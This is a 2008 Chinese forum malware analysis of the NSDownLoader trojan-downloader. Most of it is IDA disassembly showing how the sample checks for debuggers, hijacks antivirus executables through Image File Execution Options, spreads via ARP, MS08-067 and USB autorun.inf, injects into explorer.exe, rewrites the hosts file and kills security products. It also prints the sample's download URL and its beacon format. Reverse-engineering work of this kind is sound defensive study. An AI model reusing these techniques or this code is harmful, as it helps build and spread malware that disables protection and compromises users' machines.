NSDownLoader25 Vip20081130分析

标题：NSDownLoader25 Vip20081130分析
作者：冷血书生
时间：2008-12-12 22:33
链接：http://bbs.pediy.com/showthread.php?t=78573
病毒行为描述：释放文件，修改时间，映像劫持，利用ARP攻击在局域网传播，攻击没有修补MS08-067号漏洞的Windows系统，利用U盘自动运行功能传播，修改hosts文件等等。
代码:

1、比较当前进程是不是svchost.exe


.text:71001394                 lea     eax, [ebp+eax+String]
.text:7100139B                 push    offset Data     ; "svchost.exe"
.text:710013A0                 push    eax             ; lpString
.text:710013A1                 call    sub_7100148D    ; 比较当前进程是不是svchost.exe


2、释放驱动


.text:710013AB                 jz      short loc_710013BA
.text:710013AD                 call    CreateFileA_0   ; 驱动
.text:710013B2                 push    esi

3、将时间修改为svchost.exe时间


.text:710013B3                 call    sub_71002501    ; svchost.exe时间
.text:710013B8                 jmp     short loc_710013C9
.text:710013BA ; ---------------------------------------------------------------------------

4、创建线程

.text:710013BA loc_710013BA:                           ; CODE XREF: DllEntryPoint+65j
.text:710013BA                 push    esi             ; dwCreationFlags
.text:710013BB                 push    esi             ; lpParameter
.text:710013BC                 push    offset CreateThread_1 ; lpStartAddress
.text:710013C1                 push    esi             ; dwStackSize
.text:710013C2                 push    esi             ; lpThreadAttributes
.text:710013C3                 call    ds:CreateThread

5、遍历进程

.text:710010A4                 push    eax             ; int
.text:710010A5                 push    offset aOllydbg_exe ; "OllyDbg.exe"
.text:710010AA                 call    sub_7100148D
.text:710010AF                 test    eax, eax
.text:710010B1                 pop     ecx
.text:710010B2                 pop     ecx
.text:710010B3                 jz      loc_7100114D
.text:710010B9                 lea     eax, [ebp+78h+pe.szExeFile]
.text:710010BF                 push    eax             ; int
.text:710010C0                 push    offset aOllyice_exe ; "OllyICE.exe"
.text:710010C5                 call    sub_7100148D
.text:710010CA                 test    eax, eax
.text:710010CC                 pop     ecx
.text:710010CD                 pop     ecx
.text:710010CE                 jz      short loc_7100114D
.text:710010D0                 lea     eax, [ebp+78h+pe.szExeFile]
.text:710010D6                 push    eax             ; int
.text:710010D7                 push    offset aPeditor_exe ; "PEditor.exe"
.text:710010DC                 call    sub_7100148D
.text:710010E1                 test    eax, eax
.text:710010E3                 pop     ecx
.text:710010E4                 pop     ecx
.text:710010E5                 jz      short loc_7100114D
.text:710010E7                 lea     eax, [ebp+78h+pe.szExeFile]
.text:710010ED                 push    eax             ; int
.text:710010EE                 push    offset aLordpe_exe ; "LordPE.exe"
.text:710010F3                 call    sub_7100148D
.text:710010F8                 test    eax, eax
.text:710010FA                 pop     ecx
.text:710010FB                 pop     ecx
.text:710010FC                 jz      short loc_7100114D
.text:710010FE                 lea     eax, [ebp+78h+pe.szExeFile]
.text:71001104                 push    eax             ; int
.text:71001105                 push    offset aC32asm_exe ; "C32Asm.exe"
.text:7100110A                 call    sub_7100148D
.text:7100110F                 test    eax, eax
.text:71001111                 pop     ecx
.text:71001112                 pop     ecx
.text:71001113                 jz      short loc_7100114D
.text:71001115                 lea     eax, [ebp+78h+pe.szExeFile]
.text:7100111B                 push    eax             ; int
.text:7100111C                 push    offset aImportrec_exe ; "ImportREC.exe"
.text:71001121                 call    sub_7100148D
.text:71001126                 test    eax, eax
.text:71001128                 pop     ecx
.text:71001129                 pop     ecx


6、映像劫持


.text:71001C4B                 push    esi             ; ulOptions
.text:71001C4C                 push    offset SubKey   ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution  Options
.text:71001C51                 push    80000002h       ; hKey
.text:71001C56                 call    ds:RegOpenKeyExA
.text:71001C5C                 push    offset aSleep   ; "Sleep"
.text:71001C61                 push    offset LibFileName ; "kernel32.dll"
.text:71001C66                 call    ds:LoadLibraryW
.text:71001C6C                 push    eax             ; hModule
.text:71001C6D                 call    ds:GetProcAddress
.text:71001C73                 mov     ebx, ds:RegCreateKeyExA
.text:71001C79                 mov     ebp, ds:RegSetValueExA
.text:71001C7F                 mov     [esp+20h+var_4], eax
.text:71001C83
.text:71001C83 loc_71001C83:                           ; CODE XREF: IFEO+E4j
.text:71001C83                 push    esi             ; lpdwDisposition
.text:71001C84                 lea     eax, [esp+24h+phkResult]
.text:71001C88                 push    eax             ; phkResult
.text:71001C89                 push    esi             ; lpSecurityAttributes
.text:71001C8A                 push    edi             ; samDesired
.text:71001C8B                 push    esi             ; dwOptions
.text:71001C8C                 push    esi             ; lpClass
.text:71001C8D                 push    esi             ; Reserved
.text:71001C8E                 push    offset aAvp_exe ; "avp.exe"
.text:71001C93                 push    [esp+40h+hKey]  ; hKey
.text:71001C97                 mov     [esp+44h+phkResult], esi
.text:71001C9B                 call    ebx ; RegCreateKeyExA
.text:71001C9D                 push    0Ch             ; cbData
.text:71001C9F                 push    offset Data     ; "svchost.exe"
.text:71001CA4                 push    1               ; dwType
.text:71001CA6                 push    esi             ; Reserved
.text:71001CA7                 push    offset ValueName ; "Debugger"
.text:71001CAC                 push    [esp+34h+phkResult] ; hKey
.text:71001CB0                 call    ebp ; RegSetValueExA
.text:71001CB2                 push    [esp+20h+phkResult] ; hKey
.text:71001CB6                 call    ds:RegCloseKey
.text:71001CBC                 mov     eax, lpSubKey
.text:71001CC1                 cmp     eax, esi
.text:71001CC3                 jz      short loc_71001D0D
.text:71001CC5                 mov     [esp+20h+var_8], offset lpSubKey
.text:71001CCD
.text:71001CCD loc_71001CCD:                           ; CODE XREF: IFEO+D9j
.text:71001CCD                 push    esi             ; lpdwDisposition
.text:71001CCE                 lea     ecx, [esp+24h+phkResult]
.text:71001CD2                 push    ecx             ; phkResult
.text:71001CD3                 push    esi             ; lpSecurityAttributes
.text:71001CD4                 push    edi             ; samDesired
.text:71001CD5                 push    esi             ; dwOptions
.text:71001CD6                 push    esi             ; lpClass
.text:71001CD7                 push    esi             ; Reserved
.text:71001CD8                 push    eax             ; lpSubKey
.text:71001CD9                 push    [esp+40h+hKey]  ; hKey
.text:71001CDD                 call    ebx ; RegCreateKeyExA
.text:71001CDF                 push    0Ch             ; cbData
.text:71001CE1                 push    offset Data     ; "svchost.exe"
.text:71001CE6                 push    1               ; dwType
.text:71001CE8                 push    esi             ; Reserved
.text:71001CE9                 push    offset ValueName ; "Debugger"
.text:71001CEE                 push    [esp+34h+phkResult] ; hKey
.text:71001CF2                 call    ebp ; RegSetValueExA
.text:71001CF4                 push    [esp+20h+phkResult] ; hKey
.text:71001CF8                 call    ds:RegCloseKey
    
7、提权

.text:71001B89                 mov     ebp, offset aSesecuritypriv ; "SeSecurityPrivilege"
.text:71001B8E                 push    ebp             ; lpName
.text:71001B8F                 call    tiquan          ; 提权
.text:71001B94                 pop     ecx


8、受影响版本、SendARP、机器信息


.text:71003ABB                 push    80h
.text:71003AC0                 push    eax             ; lpString1
.text:71003AC1                 call    GetVersionExA_0 ; 受影响版本


.text:71003AD4                 push    eax
.text:71003AD5                 call    sub_710038DB    ; SendARP
.text:71003ADA                 push    1Fh


.text:71003B0F                 lea     eax, [ebp+74h+var_8C]
.text:71003B12                 push    offset a_2x_2x_2x_2x_2 ; "%.2X-%.2X-%.2X-%.2X-%.2X-%.2X"
.text:71003B17                 push    eax             ; LPSTR
.text:71003B18                 call    ebx ; wsprintfA
.text:71003B1A                 mov     [ebp+74h+var_314], 0
.text:71003B21                 push    40h
.text:71003B23                 xor     eax, eax
.text:71003B25                 pop     ecx
.text:71003B26                 lea     edi, [ebp+74h+var_313]
.text:71003B2C                 rep stosd
.text:71003B2E                 stosw
.text:71003B30                 stosb
.text:71003B31                 mov     eax, dword_71008120
.text:71003B36                 mov     ecx, eax
.text:71003B38                 mov     edx, ecx
.text:71003B3A                 shr     ecx, 2
.text:71003B3D                 mov     esi, offset unk_710080A0
.text:71003B42                 lea     edi, [ebp+74h+var_314]
.text:71003B48                 rep movsd
.text:71003B4A                 push    eax
.text:71003B4B                 mov     ecx, edx
.text:71003B4D                 lea     eax, [ebp+74h+var_314]
.text:71003B53                 and     ecx, 3
.text:71003B56                 push    eax
.text:71003B57                 rep movsb
.text:71003B59                 call    sub_710013D1
.text:71003B5E                 add     esp, 34h
.text:71003B61                 push    offset aUrldownloadtof ; "URLDownloadToFileA"
.text:71003B66                 push    offset aUrlmon_dll ; "Urlmon.dll"
.text:71003B6B                 call    ds:LoadLibraryW
.text:71003B71                 push    eax             ; hModule
.text:71003B72                 call    ds:GetProcAddress
.text:71003B78                 test    eax, eax
.text:71003B7A                 mov     [ebp+74h+var_8], eax
.text:71003B7D                 jz      loc_71003C35
.text:71003B83                 mov     esi, ds:GetTickCount
.text:71003B89                 push    7Fh
.text:71003B8B                 mov     [ebp+74h+var_514], 0
.text:71003B92                 xor     eax, eax
.text:71003B94                 pop     ecx
.text:71003B95                 lea     edi, [ebp+74h+var_513]
.text:71003B9B                 rep stosd
.text:71003B9D                 stosw
.text:71003B9F                 stosb
.text:71003BA0                 call    esi ; GetTickCount
.text:71003BA2                 mov     edi, eax
.text:71003BA4                 lea     eax, [ebp+74h+var_8C]
.text:71003BA7                 push    edi
.text:71003BA8                 push    eax
.text:71003BA9                 call    sub_710038A9
.text:71003BAE                 push    eax
.text:71003BAF                 push    edi
.text:71003BB0                 lea     eax, [ebp+74h+String1]
.text:71003BB6                 push    eax
.text:71003BB7                 lea     eax, [ebp+74h+var_8C]
.text:71003BBA                 push    eax
.text:71003BBB                 lea     eax, [ebp+74h+var_314]
.text:71003BC1                 push    eax
.text:71003BC2                 lea     eax, [ebp+74h+var_514]
.text:71003BC8                 push    offset aS?macSOsSVer2_ ; "%s?mac=%s&os=%s&ver=2.5.1130&temp=%d&ke"...
.text:71003BCD                 push    eax             ; LPSTR
.text:71003BCE                 call    ebx ; wsprintfA
.text:71003BD0                 add     esp, 24h
.text:71003BD3                 push    40h
.text:71003BD5                 pop     ecx
.text:71003BD6                 xor     eax, eax
.text:71003BD8                 mov     [ebp+74h+Buffer], 0
.text:71003BDF                 lea     edi, [ebp+74h+var_20F]
.text:71003BE5                 rep stosd
.text:71003BE7                 stosw
.text:71003BE9                 stosb
.text:71003BEA                 lea     eax, [ebp+74h+Buffer]
.text:71003BF0                 push    eax             ; lpBuffer
.text:71003BF1                 push    104h            ; nBufferLength
.text:71003BF6                 call    ds:GetTempPathA
.text:71003BFC                 call    esi ; GetTickCount
.text:71003BFE                 push    eax
.text:71003BFF                 lea     eax, [ebp+74h+Buffer]
.text:71003C05                 push    eax
.text:71003C06                 push    offset aSD_txt  ; "%s%d.txt"
.text:71003C0B                 push    eax             ; LPSTR
.text:71003C0C                 call    ebx ; wsprintfA


9、下载者：http://biao.djdj4455.cn/number/list.txt


.text:710022EB                 push    dword_7100809C
.text:710022F1                 mov     esi, offset asc_7100801C ; "!构"
.text:710022F6                 push    esi
.text:710022F7                 call    sub_710013D1    ; 解密call
.text:710022F7                                         ; http://biao.djdj4455.cn/number/list.txt
.text:710022FC                 pop     ecx


10、 Autorun

text:71003F07                 push    edi
.text:71003F08                 mov     ebp, offset aExplore ; "explore"
.text:71003F0D                 mov     esi, offset aSystem_dll ; "system.dll"
.text:71003F12
.text:71003F12 loc_71003F12:                           ; CODE XREF: autorun+1CAj
.text:71003F12                 lea     eax, [esp+734h+Buffer]
.text:71003F19                 push    eax             ; lpBuffer
.text:71003F1A                 push    104h            ; nBufferLength
.text:71003F1F                 call    ds:GetLogicalDriveStringsA
.text:71003F25                 lea     eax, [esp+734h+Buffer]
.text:71003F2C                 mov     [esp+734h+lpString], eax
.text:71003F30                 lea     eax, [esp+734h+lpString]
.text:71003F34                 push    eax             ; int
.text:71003F35                 lea     eax, [esp+738h+Buffer]
.text:71003F3C                 push    eax             ; lpString
.text:71003F3D                 call    sub_71003E11
.text:71003F42                 mov     edi, eax
.text:71003F44                 test    edi, edi
.text:71003F46                 pop     ecx
.text:71003F47                 pop     ecx
.text:71003F48                 mov     [esp+734h+lpString2], edi
.text:71003F4C                 jz      loc_710040BD
.text:71003F52                 jmp     short loc_71003F58
.text:71003F54 ; ---------------------------------------------------------------------------
.text:71003F54
.text:71003F54 loc_71003F54:                           ; CODE XREF: autorun+1B9j
.text:71003F54                 mov     edi, [esp+734h+lpString2]
.text:71003F58
.text:71003F58 loc_71003F58:                           ; CODE XREF: autorun+54j
.text:71003F58                 push    edi             ; lpRootPathName
.text:71003F59                 call    ds:GetDriveTypeA
.text:71003F5F                 mov     ebx, ds:lstrcmpiA
.text:71003F65                 push    offset aA       ; "A:\\"
.text:71003F6A                 push    edi             ; lpString1
.text:71003F6B                 mov     [esp+73Ch+var_71C], eax
.text:71003F6F                 call    ebx ; lstrcmpiA
.text:71003F71                 test    eax, eax
.text:71003F73                 jz      loc_710040A1
.text:71003F79                 push    offset aB       ; "B:\\"
.text:71003F7E                 push    edi             ; lpString1
.text:71003F7F                 call    ebx ; lstrcmpiA
.text:71003F81                 test    eax, eax
.text:71003F83                 jz      loc_710040A1
.text:71003F89                 mov     eax, [esp+734h+var_71C]
.text:71003F8D                 cmp     eax, dword_7100800C
.text:71003F93                 jz      short loc_71003FA1
.text:71003F95                 cmp     eax, dword_71008010
.text:71003F9B                 jnz     loc_710040A1
.text:71003FA1
.text:71003FA1 loc_71003FA1:                           ; CODE XREF: autorun+95j
.text:71003FA1                 push    offset aAutorun ; "autorun"
.text:71003FA6                 push    edi
.text:71003FA7                 lea     eax, [esp+73Ch+FileName]
.text:71003FAB                 push    offset aSS_inf  ; "%s%s.inf"
.text:71003FB0                 push    eax             ; LPSTR
.text:71003FB1                 call    ds:wsprintfA
.text:71003FB7                 add     esp, 10h
.text:71003FBA                 push    6               ; dwFileAttributes
.text:71003FBC                 lea     eax, [esp+738h+FileName]
.text:71003FC0                 push    eax             ; lpFileName
.text:71003FC1                 call    ds:SetFileAttributesA
.text:71003FC7                 lea     eax, [esp+734h+FileName]
.text:71003FCB                 push    eax             ; lpPathName
.text:71003FCC                 call    ds:RemoveDirectoryA
.text:71003FD2                 push    0               ; hTemplateFile
.text:71003FD4                 push    6               ; dwFlagsAndAttributes
.text:71003FD6                 push    4               ; dwCreationDisposition
.text:71003FD8                 push    0               ; lpSecurityAttributes
.text:71003FDA                 push    7               ; dwShareMode
.text:71003FDC                 push    0C0000000h      ; dwDesiredAccess
.text:71003FE1                 lea     eax, [esp+74Ch+FileName]
.text:71003FE5                 push    eax             ; lpFileName
.text:71003FE6                 call    ds:CreateFileA
.text:71003FEC                 mov     ebx, eax
.text:71003FEE                 xor     eax, eax
.text:71003FF0                 mov     [esp+734h+String], 0
.text:71003FF8                 mov     ecx, 0FFh
.text:71003FFD                 lea     edi, [esp+734h+var_3FF]
.text:71004004                 rep stosd
.text:71004006                 push    ebp
.text:71004007                 push    esi
.text:71004008                 stosw
.text:7100400A                 stosb
.text:7100400B                 mov     eax, offset aCommandRundll3 ; "command=rundll32"
.text:71004010                 push    eax
.text:71004011                 push    ebp
.text:71004012                 mov     ecx, offset aShell ; "shell"
.text:71004017                 push    ecx
.text:71004018                 push    ebp
.text:71004019                 push    esi
.text:7100401A                 push    eax
.text:7100401B                 push    ecx
.text:7100401C                 push    offset aAutorun ; "autorun"
.text:71004021                 lea     eax, [esp+75Ch+String]
.text:71004028                 push    offset aSSOpenSSSSSSSS ; "[%s]\r\n%s\\open\\%s %s,%s\r\n%s\\%s\\%s %s,%s"
.text:7100402D                 push    eax             ; LPSTR
.text:7100402E                 call    ds:wsprintfA
.text:71004034                 add     esp, 30h
.text:71004037                 lea     eax, [esp+734h+String]
.text:7100403E                 push    eax             ; lpString
.text:7100403F                 call    ds:lstrlenA
.text:71004045                 push    0               ; lpOverlapped
.text:71004047                 lea     ecx, [esp+738h+NumberOfBytesWritten]
.text:7100404B                 push    ecx             ; lpNumberOfBytesWritten
.text:7100404C                 inc     eax
.text:7100404D                 push    eax             ; nNumberOfBytesToWrite
.text:7100404E                 lea     eax, [esp+740h+String]
.text:71004055                 push    eax             ; lpBuffer
.text:71004056                 push    ebx             ; hFile
.text:71004057                 call    ds:WriteFile
.text:7100405D                 push    ebx             ; hFile
.text:7100405E                 call    ds:SetEndOfFile
.text:71004064                 push    ebx             ; hFile
.text:71004065                 call    ds:FlushFileBuffers
.text:7100406B                 push    ebx             ; hObject
.text:7100406C                 call    ds:CloseHandle
.text:71004072                 push    [esp+734h+lpString2] ; lpString2
.text:71004076                 lea     eax, [esp+738h+String1]
.text:7100407D                 push    eax             ; lpString1
.text:7100407E                 call    ds:lstrcpyA
.text:71004084                 push    esi             ; lpString2
.text:71004085                 lea     eax, [esp+738h+String1]
.text:7100408C                 push    eax             ; lpString1
.text:7100408D                 call    ds:lstrcatA
.text:71004093                 lea     eax, [esp+734h+String1]
.text:7100409A                 push    eax             ; lpFileName
.text:7100409B                 call    sub_71003E6E
.text:710040A0                 pop     ecx
.text:710040A1
.text:710040A1 loc_710040A1:                           ; CODE XREF: autorun+75j
.text:710040A1                                         ; autorun+85j ...
.text:710040A1                 lea     eax, [esp+734h+lpString]
.text:710040A5                 push    eax             ; int
.text:710040A6                 push    [esp+738h+lpString] ; lpString
.text:710040AA                 call    sub_71003E11
.text:710040AF                 test    eax, eax
.text:710040B1                 pop     ecx
.text:710040B2                 pop     ecx
.text:710040B3                 mov     [esp+734h+lpString2], eax
.text:710040B7                 jnz     loc_71003F54
.text:710040BD
.text:710040BD loc_710040BD:                           ; CODE XREF: autorun+4Ej
.text:710040BD                 push    2710h           ; dwMilliseconds
.text:710040C2                 call    ds:Sleep


11、注入


.text:71003D8C                 call    ds:GetSystemDirectoryA
.text:71003D92                 push    offset aAppwinproc_dll ; "\\appwinproc.dll"
.text:71003D97                 lea     eax, [ebp+Buffer]
.text:71003D9D                 push    eax             ; lpString1
.text:71003D9E                 call    ds:lstrcatA
.text:71003DA4                 lea     eax, [ebp+Buffer]
.text:71003DAA                 push    eax             ; lpFileName
.text:71003DAB                 push    69h             ; nNumberOfBytesToWrite
.text:71003DAD                 push    offset Type     ; "RES"
.text:71003DB2                 push    hModule         ; hModule
.text:71003DB8                 call    sub_71003558
.text:71003DBD                 add     esp, 10h
.text:71003DC0
.text:71003DC0 loc_71003DC0:                           ; CODE XREF: inject+7Dj
.text:71003DC0                 push    offset aExplorer_exe ; "explorer.exe"
.text:71003DC5                 call    sub_710014EE
.text:71003DCA                 mov     esi, eax
.text:71003DCC                 mov     [esp+110h+var_110], 2710h
.text:71003DD3                 call    ds:Sleep
.text:71003DD9                 test    esi, esi
.text:71003DDB                 jz      short loc_71003DC0
.text:71003DDD                 push    esi             ; dwProcessId
.text:71003DDE                 push    0               ; bInheritHandle
.text:71003DE0                 push    10043Ah         ; dwDesiredAccess
.text:71003DE5                 call    ds:OpenProcess
.text:71003DEB                 mov     esi, eax
.text:71003DED                 test    esi, esi
.text:71003DEF                 jz      loc_71003D69
.text:71003DF5                 lea     eax, [ebp+Buffer]
.text:71003DFB                 push    eax             ; lpBuffer
.text:71003DFC                 push    esi             ; hProcess
.text:71003DFD                 call    sub_71002474
.text:71003E02                 push    0FFFFFFFFh      ; dwMilliseconds
.text:71003E04                 push    esi             ; hHandle
.text:71003E05                 call    ds:WaitForSingleObject
.text:71003E0B                 jmp     loc_71003D69


12、修改hosts文件

text:710040FD                 call    ds:GetSystemDirectoryA
.text:71004103                 push    offset aDriversEtcHost ; "\\drivers\\etc\\hosts"
.text:71004108                 lea     eax, [ebp+FileName]
.text:7100410E                 push    eax             ; lpString1
.text:7100410F                 call    ds:lstrcatA
.text:71004115                 mov     esi, 80h
.text:7100411A                 push    esi             ; dwFileAttributes
.text:7100411B                 lea     eax, [ebp+FileName]
.text:71004121                 push    eax             ; lpFileName
.text:71004122                 call    ds:SetFileAttributesA
.text:71004128                 push    ebx             ; hTemplateFile
.text:71004129                 push    esi             ; dwFlagsAndAttributes
.text:7100412A                 push    4               ; dwCreationDisposition
.text:7100412C                 push    ebx             ; lpSecurityAttributes
.text:7100412D                 push    1               ; dwShareMode
.text:7100412F                 push    40000000h       ; dwDesiredAccess
.text:71004134                 lea     eax, [ebp+FileName]
.text:7100413A                 push    eax             ; lpFileName
.text:7100413B                 call    ds:CreateFileA
.text:71004141                 mov     edi, eax
.text:71004143
.text:71004143 loc_71004143:                           ; CODE XREF: modifly_hosts+E0j
.text:71004143                 push    ebx             ; dwMoveMethod
.text:71004144                 push    ebx             ; lpDistanceToMoveHigh
.text:71004145                 push    ebx             ; lDistanceToMove
.text:71004146                 push    edi             ; hFile
.text:71004147                 call    ds:SetFilePointer
.text:7100414D                 mov     eax, off_71008430
.text:71004152                 cmp     eax, ebx
.text:71004154                 jz      short loc_7100419B
.text:71004156                 mov     esi, offset off_71008430
.text:7100415B
.text:7100415B loc_7100415B:                           ; CODE XREF: modifly_hosts+CCj
.text:7100415B                 push    eax
.text:7100415C                 lea     eax, [ebp+String]
.text:71004162                 push    offset a127_0_0_1S ; "127.0.0.1 %s\r\n"
.text:71004167                 push    eax             ; LPSTR
.text:71004168                 call    ds:wsprintfA
.text:7100416E                 add     esp, 0Ch
.text:71004171                 push    ebx             ; lpOverlapped
.text:71004172                 lea     eax, [ebp+NumberOfBytesWritten]
.text:71004175                 push    eax             ; lpNumberOfBytesWritten
.text:71004176                 lea     eax, [ebp+String]
.text:7100417C                 push    eax             ; lpString
.text:7100417D                 call    ds:lstrlenA
.text:71004183                 push    eax             ; nNumberOfBytesToWrite
.text:71004184                 lea     eax, [ebp+String]
.text:7100418A                 push    eax             ; lpBuffer
.text:7100418B                 push    edi             ; hFile
.text:7100418C                 call    ds:WriteFile
.text:71004192                 add     esi, 4
.text:71004195                 mov     eax, [esi]
.text:71004197                 cmp     eax, ebx
.text:71004199                 jnz     short loc_7100415B
.text:7100419B
.text:7100419B loc_7100419B:                           ; CODE XREF: modifly_hosts+87j
.text:7100419B                 push    edi             ; hFile
.text:7100419C                 call    ds:SetEndOfFile
.text:710041A2                 push    7530h           ; dwMilliseconds
.text:710041A7                 call    ds:Sleep


13、利用ms0867漏洞


.text:71001E12                 push    offset aMs0867  ; "Ms0867"
.text:71001E17                 lea     eax, [ebx+84h]
.text:71001E1D                 push    eax             ; lpLibFileName
.text:71001E1E                 mov     byte ptr [ebp+arg_0+3], 1
.text:71001E22                 call    ds:LoadLibraryA
.text:71001E28                 push    eax             ; hModule
.text:71001E29                 call    ds:GetProcAddress
.text:71001E2F                 test    eax, eax
.text:71001E31                 mov     dword ptr [ebp+name.sa_data+2], eax
.text:71001E34                 jz      short loc_71001EB0
.text:71001E36                 push    esi
.text:71001E37                 push    edi
.text:71001E38                 mov     esi, offset CriticalSection
.text:71001E3D
.text:71001E3D loc_71001E3D:                           ; CODE XREF: sub_71001DFC+B0j
.text:71001E3D                 push    esi             ; lpCriticalSection
.text:71001E3E                 call    ds:EnterCriticalSection
.text:71001E44                 lea     eax, [ebx+4]
.text:71001E47                 push    eax
.text:71001E48                 call    dword ptr [ebp+name.sa_data+2]
.text:71001E4B                 push    esi             ; lpCriticalSection
.text:71001E4C                 mov     edi, eax
.text:71001E4E                 call    ds:LeaveCriticalSection
.text:71001E54                 test    edi, edi
.text:71001E56                 jz      short loc_71001EA5
.text:71001E58                 push    0               ; protocol
.text:71001E5A                 push    1               ; type
.text:71001E5C                 push    2               ; af
.text:71001E5E                 call    socket
.text:71001E63                 push    115Ch           ; hostshort
.text:71001E68                 mov     dword ptr [ebp+name.sa_data+6], eax
.text:71001E6B                 call    htons
.text:71001E70                 push    10h             ; namelen
.text:71001E72                 lea     eax, [ebp+name]
.text:71001E75                 push    eax             ; name
.text:71001E76                 push    dword ptr [ebp+name.sa_data+6] ; s
.text:71001E79                 call    connect
.text:71001E7E                 cmp     eax, 0FFFFFFFFh
.text:71001E81                 jz      short loc_71001E9D
.text:71001E83                 mov     edi, [ebx]
.text:71001E85                 push    edi             ; lpString
.text:71001E86                 call    ds:lstrlenA
.text:71001E8C                 push    0               ; flags
.text:71001E8E                 push    eax             ; len
.text:71001E8F                 push    edi             ; buf
.text:71001E90                 push    dword ptr [ebp+name.sa_data+6] ; s
.text:71001E93                 call    send
.text:71001E98                 cmp     eax, 0FFFFFFFFh
.text:71001E9B                 jnz     short loc_71001EA5
.text:71001E9D
.text:71001E9D loc_71001E9D:                           ; CODE XREF: sub_71001DFC+85j
.text:71001E9D                 push    dword ptr [ebp+name.sa_data+6] ; s
.text:71001EA0                 call    closesocket
.text:71001EA5
.text:71001EA5 loc_71001EA5:                           ; CODE XREF: sub_71001DFC+5Aj
.text:71001EA5                                         ; sub_71001DFC+9Fj
.text:71001EA5                 inc     byte ptr [ebp+arg_0+3]
.text:71001EA8                 cmp     byte ptr [ebp+arg_0+3], 0FEh
.text:71001EAC                 jbe     short loc_71001E3D
.text:71001EAE                 pop     edi
.text:71001EAF                 pop     esi


14、释放驱动


push    offset NsPass_d_sys ; lpStartAddress
call    CreateThread_0


15、appwinproc.dll主要是kill AV


.data:10003004                 dd offset aMcafee       ; "McAfee"
.data:10003008                 dd offset aMP           ; "超级巡警"
.data:1000300C                 dd offset a360L         ; "360安全卫士"
.data:10003010                 dd offset aCV           ; "奇虎"
.data:10003014                 dd offset unk_10002074
.data:10003018                 dd offset asc_1000206C  ; "杀毒"
.data:1000301C                 dd offset aA            ; "木马"
.data:10003020                 dd offset aI            ; "专杀"
.data:10003024                 dd offset asc_10002054  ; "下载者"
.data:10003028                 dd offset unk_10002048
.data:1000302C                 dd offset aNod32        ; "NOD32"
.data:10003030                 dd offset unk_10002034
.data:10003034                 dd offset unk_10002028